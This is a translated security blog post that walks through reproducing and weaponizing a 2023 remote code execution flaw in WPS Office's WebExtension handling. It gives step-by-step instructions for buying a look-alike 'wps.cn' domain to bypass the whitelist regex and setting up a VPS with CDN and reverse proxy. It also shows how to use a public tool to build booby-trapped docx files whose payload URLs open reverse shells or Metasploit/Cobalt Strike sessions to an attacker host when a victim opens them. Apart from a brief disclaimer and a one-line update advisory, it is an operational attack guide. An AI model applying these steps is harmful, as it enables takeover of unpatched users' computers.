Article directory
Preface
The WPS Office exposed during 2023HVV has an RCE vulnerability. An attacker can use this vulnerability to execute arbitrary commands and obtain server control permissions.
statement
Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.
1. Vulnerability description
WebExtension in Office (often called Office plug-ins or Office applications) is a technology used to extend the functionality of Microsoft Office. Office plug-ins enable third-party developers to integrate their own services and functions into Office applications. These plug-ins are developed using cross-platform web technologies (such as HTML, CSS and JavaScript) and can run on different platforms and devices.
A simple understanding is that Office has a built-in browser that can parse html/javascript/css code. The vulnerability this time is that WPS failed to correctly process javascript code when processing WebExtension, resulting in overflow RCE (please refer to the previous exposure of Chrome) RCE vulnerability, WeChat Windows version <3.1.2.141 has RCE vulnerability, which is similar)
2. Scope of influence
- WPS Office 2023 Personal Edition < 11.1.0.15120
- WPS Office 2019 Enterprise Edition < 11.8.2.12085
3. Recurrence of vulnerabilities
Download the vulnerability environment package:
https://official-package.wpscdn.cn/wps/download/WPS_Setup_12300.exe
Server : Bind the domain name clientWeb.docer.wps.cn.****.wps.cnand open the Web service. There is an html file in the same directory;
Client : Inject the Payload into a normal docx file, such as https://clientweb.docer.wps.cn/shell/vpsIP/9000sending it to the target host, open the docx file and successfully rebound the Shell;
Next, we reproduce locally. When reproducing locally, we need to modify the hosts file. The hosts are changed to conform to the form of clientweb.docer.wps.cn.{****}.wps.cn, and the hosts file directory is C:\windows\System32\drivers\etc.
In this recurrence, add host as 127.0.0.1 clientweb.docer.wps.cn.****wps.cn. As shown in the figure below,
start the HTTP service
. Start the http service in the POC directory. Service command: py -3 -m http.server 80
Use the browser to access clientweb.docer.wps.cn.cloudwps.cn
and open poc.docx to pop up the calculator.
In addition to reproducing the above methods, the vulnerability can also be further exploited through scripts
github project: wps-rce
- Install corresponding dependencies
- The program needs to be used
python3.8以上的版本to run properly
pip3 install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
Server side functions
- The server's main.py is in the Server directory. This python script is used to generate HTML code. It also supports generating shell, MSF, and CS rebound codes.
- Need to purchase domain name ****wps.cn
- Need to purchase VPS
- The domain name clientwps.docer.wps.cn.***wps.cn needs to be resolved to the VPS
When main.py is run here, the listening port is port 80, and root privileges are required.
Python starts the main script service in the Server directory
- By default, in order to facilitate binding with domain names, the service listening port is 80.
- If you want to use Nginx/Caddy for reverse proxy, you can modify the port yourself.
Directly access the domain name resolution address or VPS port
- This server is developed based on the POC published on the Internet. Accessing the corresponding address can directly generate the utilization code of the corresponding program.
- The URL corresponds to the payload list of CS and MSF.
It can be accessed directly using the VPS IP. Test locally and bind hosts
to access for testing
. After the above environment is configured, prepare the payload for testing: http://clientweb.docer.wps.cn .lhhwps.cn/calc
Create a new normal docx document
Client functions
- The client's main.py in the Client directory. This Python script is used to generate docx files.
- A normal docx file needs to be provided, and the attack payload will be inserted into this docx.
- It needs to be based on the URL address provided by the server built above, similar to
https://clientweb.docer.wps.cn.***wps.cn/shell/127.0.0.1/9000
The above conditions are all prepared, execute the following command:
python3 main.py wps0day.docx http://clientweb.docer.wps.cn.lhhwps.cn/calc
Then download the generated new file to the local, double-click to run! Rebound calc is successfully executed.
In addition to bombing calc, you can also use rebound shell
to access the path on the browser. The parameters behind the shell can be modified by yourself. Generate a new docx document using the modified address in the script. Download the generated file
to the local, double-click to run.
The same applies to other exploits for successfully rebounding Shell ! ! !
Tips1: Local testing
- When using docx, you need to purchase the domain name of ***wps.cn. If you do not have a domain name, you can simply test it locally. You can modify the hosts file of your computer and bind the domain name manually.
- Install the vulnerable version of wps and modify the hosts file.
- Modify the C:\Windows\System32\drivers\etc\hosts file and add 127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn (note that this operation is for the convenience of local testing, and a domain name must be purchased for actual use.)
- Note that in the hosts file added above, 127.0.0.1 needs to be filled in according to the actual situation. This IP is the IP address of the running server. If the server is running on this machine, you can fill in 127.0.0.1. If it is running on another Linux server, you need to confirm whether the IP address can be accessed normally.
- Select the server payload, whether to bounce the calculator, bounce the shell, bounce the msf, or bounce the cs.
- If the shell is rebounded, the URL is generated, http://clientweb.docer.wps.cn.cloudwps.cn/shell/1.1.1.1/9000. 1.1.1.1 here needs to be modified to the IP of the server running the nc command. This The IP address can also use domain names. 9000 needs to be changed to the port that nc listens on. (Note that the IP and nc here are separate, just to accept the shell. To save trouble, you can run it directly with the server running the server.)
- Use the client command to generate the attack docx file, python main.py ~/Downloads/temp.docx http://clientweb.docer.wps.cn.cloudwps.cn/shell/1.1.1.1/9000
- Copy the generated wps_office_rce_***.docx file to the computer where wps is installed, and double-click to open it in the client.
Tip2: Vulnerability exploitation restrictions
1. Purchase the domain name ***wps.cn
- Since it is caused by javascript in WebExtension, you need to prepare the corresponding html file. WebExtension supports loading html from third-party websites, so you need to enable web services on the public network to share html files.
- Due to the limitations of wps, when we load the html of a third-party website, wps will remind you, as shown in the picture below. In WPS, the domain name of wps.cn is in the whitelist. As long as the resources we load are in the wps.cn website, there will be no such prompt. But we have no control over wps.cn.
- In WPS, there is a loophole in the whitelist detection. The code may use the regular matching of http://.*?.wps.cn. In this matching, there is obviously a loophole. We only need to put the html file at http:/ /hackwps.cn website, you can bypass detection.
- Therefore, if you want to exploit this vulnerability, you must purchase a domain name. The domain name only needs to contain wps.cn, such as hackerwps.cn, xxxwps.cn.
2. Deploy the html file to the vps and bind the domain name to the vps
- After purchasing the domain name and vps, you need to resolve the subdomain clientweb.docer.wps.cn.***wps.cn to the purchased vps, try to set up a layer of CDN, and then use nginx reverse proxy to the built service. (You can learn and deploy specific domain names/vps/cdn by yourself.)
- The subdomain name here must be clientweb.docer.wps.cn.***wps.cn, otherwise it will not pass the whitelist.
4. Repair suggestions
Update to latest version